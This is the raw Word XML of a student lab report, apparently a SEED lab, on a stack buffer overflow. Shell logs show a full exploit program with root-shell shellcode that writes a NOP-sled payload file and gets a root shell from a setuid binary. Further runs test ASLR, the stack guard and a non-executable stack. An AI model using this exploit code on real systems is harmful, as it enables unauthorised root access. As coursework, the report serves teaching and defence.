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CC" w:rsidRDefault="00A44ECC" w:rsidP="00D518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Logan Borer   Doug </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Calmes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A44ECC" w:rsidRDefault="00A44ECC" w:rsidP="00D5184A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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08:02]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root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Password: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08:02]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:/home/seed/Documents#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gcc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-o stack -z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execstack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fno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-stack-protector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stack.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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08:03]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:/home/seed/Documents#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4755 stack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08:03]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:/home/seed/Documents# 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>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B3321">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">[11/08/2016 08:03] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB3321">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>seed@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DB3321">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB3321">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DB3321">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">/Documents$ cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB3321">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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exploit.c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/* A program that creates a file containing code for launching shell*/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#include &lt;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stdlib.h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&gt;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#include &lt;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stdio.h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&gt;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#include &lt;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string.h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&gt;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char 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shellcode[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]=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// Set effective UID to root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"\x31\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xdb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xorl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ebx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,%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ebx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"\x31\xc0"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xorl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,%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"\xb0\xd5"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movb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$0xd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5,%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al*/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xcd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\x80"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 $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0x80*/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// Launch shell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"\x31\xc0" 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xorl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,%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"\x50"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pushl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"\x68""//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sh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" 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pushl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$0x68732f2f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"\x68""/bin" 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pushl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$0x6e69622f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"\x89\xe3" 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movl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esp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,%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ebx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"\x50"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pushl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"\x53"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pushl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ebx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"\x89\xe1" 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movl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esp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,%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ecx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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>"\x99"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cdq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"\xb0\x0b"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movb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$0x0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b,%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al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"\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xcd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\x80" </w:t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/*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$0x80*/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// Get Stack Pointer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ussing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assembly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unsigned long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get_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sp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) {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__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asm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_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_(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"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movl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%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esp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,%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eax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");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}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void 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main(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argc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, char **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argv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) {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char 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buffer[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517];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FILE *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/* Initialize buffer with 0x90 (NOP instruction)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memset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&amp;buffer, 0x90, 517);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/* You need to fill the buffer with appropriate contents here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offset = 260;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difference =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sizeof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(buffer) -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sizeof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(shellcode) - 1;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long *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ptr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= (long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*)buffer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 xml:space="preserve">long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retaddr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=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get_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sp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) + offset;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printf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"Return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: %p\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nAddress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: %p\n",(void *)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get_sp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(),(void *)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retaddr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);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// Fill the first few bytes of the buffer with the return address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= 0;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for(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i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= 0;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&lt; 24;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i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++)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*(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ptr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++) =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retaddr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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>// Copy the shellcode to the buffer at the end and add a null terminator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memcpy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buffer + difference, shellcode,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sizeof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(shellcode));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buffer[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sizeof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(buffer) - 1] = '\0';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  <w:t>/* Save the contents to the file "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" */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= </w:t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fopen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>"./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", "w");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fwrite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buffer, 517, 1,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);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ab/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fclose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(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);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}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08:03]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08:03]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08:03]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08:03]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gcc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-o exploit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exploit.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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[11/08/2016 08:03]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/Documents$ ./exploit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Return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 0xbffff138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Address: 0xbffff23c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[11/08/2016 08:03]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/Documents$ ./stack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# id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uid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=0(root)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gid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=1000(seed) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),130(wireshark),1000(seed)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#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whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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root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# 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08:04]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08:04]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08:04]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root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Password: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08:04]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:/home/seed/Documents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#  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D5184A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sysctl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-w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kernel.randomize_va_space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=2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184A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kernel.randomize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>_va_space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= 2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08:04]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:/home/seed/Documents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#  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D5184A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sysctl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-w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kernel.randomize_va_space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=0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184A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kernel.randomize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>_va_space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= 0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08:05]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:/home/seed/Documents# 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>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08:05]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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Password: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08:05]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:/home/seed/Documents#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gcc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-o stack -z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execstack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stack.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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08:06]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:/home/seed/Documents# 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>exit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[11/08/2016 08:06]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/Documents$ ./exploit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Return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 0xbffff138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Address: 0xbffff23c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[11/08/2016 08:06]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/Documents$ ./stack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*** stack smashing detected ***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: .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/stack terminated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=======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Backtrace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 =========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/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x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45)[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0xb7f240e5]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/lib/i386-linux-gnu/libc.so.6(+0x10409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a)[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0xb7f2409a]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./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stack[0x8048513]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[0xbffff23c]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[0x90909090]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======= Memory map: ========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08048000-08049000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08:01 1582818    /home/seed/Documents/stack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08049000-0804a000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08:01 1582818    /home/seed/Documents/stack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0804a000-0804b000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00001000 08:01 1582818    /home/seed/Documents/stack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0804b000-0806c000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00:00 0       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  [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heap]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b7def000-b7e0b000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08:01 2360149    /lib/i386-linux-gnu/libgcc_s.so.1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b7e0b000-b7e0c000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0001b000 08:01 2360149    /lib/i386-linux-gnu/libgcc_s.so.1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b7e0c000-b7e0d000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0001c000 08:01 2360149    /lib/i386-linux-gnu/libgcc_s.so.1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b7e1f000-b7e20000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00:00 0 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b7e20000-b7fc3000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08:01 2360304    /lib/i386-linux-gnu/libc-2.15.so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lastRenderedPageBreak/>
        <w:t>b7fc3000-b7fc5000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001a3000 08:01 2360304    /lib/i386-linux-gnu/libc-2.15.so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b7fc5000-b7fc6000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001a5000 08:01 2360304    /lib/i386-linux-gnu/libc-2.15.so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b7fc6000-b7fc9000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00:00 0 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b7fd9000-b7fdd000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00:00 0 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b7fdd000-b7fde000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00:00 0       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  [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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vdso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]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b7fde000-b7ffe000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08:01 2364405    /lib/i386-linux-gnu/ld-2.15.so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b7ffe000-b7fff000 r-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0001f000 08:01 2364405    /lib/i386-linux-gnu/ld-2.15.so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b7fff000-b8000000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00020000 08:01 2364405    /lib/i386-linux-gnu/ld-2.15.so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bffdf000-c0000000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rwxp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00000000 00:00 0       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   [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stack]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Aborted (core dumped)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08:06]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08:06]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08:06]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su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Password: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08:06]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:/home/seed/Documents#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gcc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-o stack -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fno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-stack-protector -z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noexecstack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stack.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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08:07]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root@ubuntu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:/home/seed/Documents# exit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>exit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[11/08/2016 08:07]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/Documents$ ./exploit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Return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Addr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 0xbffff138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Address: 0xbffff23c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yellow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 xml:space="preserve">[11/08/2016 08:07]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yellow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yellow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yellow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yellow"/>
        </w:rPr>
        <w:t>/Documents$ ./stack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0F7501">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Segmentation fault (core dumped)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08:07]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08:07]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08:07]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 xml:space="preserve">/Documents$ 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[11/08/2016 08:07]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seed@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000F7501">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>ubuntu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>:~</w:t>
      </w:r>
      <w:proofErr w:type="gram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/Documents$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hexdump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badfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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0000000 f23c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bfff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f23c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bfff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f23c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bfff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 f23c </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F7501">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>bfff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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*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lastRenderedPageBreak/>
        <w:t>0000060 9090 9090 9090 9090 9090 9090 9090 9090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*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00001e0 9090 3190 31db b0c0 cdd5 3180 50c0 2f68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00001f0 732f 6868 622f 6e69 e389 5350 e189 b099</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5184A" w:rsidRPr="000F7501" w:rsidRDefault="00D5184A" w:rsidP="00D5184A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan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 xml:space="preserve">0000200 cd0b 0080 0000                         </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5184A" w:rsidRP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0F7501">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>0000205</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D5184A" w:rsidRDefault="00D5184A" w:rsidP="00D5184A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5184A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[11/08/2016 08:07] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5184A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>seed@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D5184A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D5184A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D5184A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/Documents$</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00435F47" w:rsidRDefault="00435F47" w:rsidP="00D5184A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00435F47" w:rsidRDefault="00435F47" w:rsidP="00D5184A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00435F47" w:rsidRDefault="00435F47" w:rsidP="00D5184A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00435F47" w:rsidRDefault="00435F47" w:rsidP="00D518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Task 1:</w:t>
      </w:r>
      <w:r w:rsidR="00FB49CC">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> See above shell log for program listing and execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00435F47" w:rsidRDefault="00435F47" w:rsidP="009C3B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Task 2:</w:t>
      </w:r>
      <w:r w:rsidR="009C3BF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Running the program with ASLR enabled makes it necessary to run the </w:t>
      </w:r>
      <w:r w:rsidR="009C3BF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">program multiple times in hopes that the address spaces line up. There </w:t>
      </w:r>
      <w:r w:rsidR="009C3BF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">is always a chance that address will hit on any given execution, or </w:t>
      </w:r>
      <w:r w:rsidR="009C3BF5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>fall through to a no-op and continue execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00435F47" w:rsidRDefault="00435F47" w:rsidP="00D518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Task 3:</w:t>
      </w:r>
      <w:r w:rsidR="00E96C11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It detected a stack smashing attempt and halted the execution of the </w:t>
      </w:r>
      <w:r w:rsidR="00E96C11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">program. The stack guard uses a canary in order to detect if changes </w:t>
      </w:r>
      <w:r w:rsidR="00E96C11">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>have been made to the stack and prevent overflow attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00435F47" w:rsidRPr="00D5184A" w:rsidRDefault="00435F47" w:rsidP="00D518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Task 4:</w:t>
      </w:r>
      <w:r w:rsidR="007B175C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The program threw a segmentation fault and halted the execution of </w:t>
      </w:r>
      <w:r w:rsidR="007B175C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">the application. Because the addresses that were on the stack were </w:t>
      </w:r>
      <w:r w:rsidR="007B175C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">overwritten, it improperly attempted execution outside of the scope of </w:t>
      </w:r>
      <w:r w:rsidR="007B175C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>the application and failed to return.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00435F47" w:rsidRPr="00D5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4A"/>
    <w:rsid w:val="000F7501"/>
    <w:rsid w:val="00270A86"/>
    <w:rsid w:val="00435F47"/>
    <w:rsid w:val="007B175C"/>
    <w:rsid w:val="009C3BF5"/>
    <w:rsid w:val="00A44ECC"/>
    <w:rsid w:val="00D5184A"/>
    <w:rsid w:val="00DB3321"/>
    <w:rsid w:val="00E96C11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1BE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1C6D8517-3F64-411E-8534-539F4A68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Borer</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Logan James Borer</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-08T16:11:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-08T16:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>